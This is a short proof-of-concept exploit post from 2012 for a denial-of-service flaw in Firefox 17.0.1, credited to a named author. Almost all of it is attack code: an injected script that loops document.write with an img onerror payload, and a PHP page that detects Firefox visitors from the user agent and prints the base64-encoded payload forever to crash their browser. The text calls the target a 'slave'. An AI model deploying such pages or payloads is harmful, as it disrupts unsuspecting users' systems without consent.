Mozilla Firefox HTML/JS DOS Vulnerability -

Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
Version : Mozilla Firefox Beta Version and Normal 17.0.1
Date : 2012-12-06
Vendor : http://www.mozilla.org
Impact : Medium
Contact : sergioyoshiman [at] gmail.com
Twitter : @sergioyoshiman
tested : windows XP SP3 & Windows 7 SP1
Author : Sergio Yoshikata - Lima , Peru
==============================================================
Mozilla Firefox JS POC
"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
==============================================================
Better way to explote the vulnerability is Using a PHP scripts that check's if slave is using firefox browser them
print the crash exploit.
==============================================================
<!DOCTYPE html>
<html>
<body>
<?php
/* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
Base64  encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
//check if slave is Using Mozilla Firefox
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox)
{
//loop forever
while(1) {
//print exploit code infinite times.
print(base64_decode($exploit));
}
}
?>
</body>
</html>
==============================================================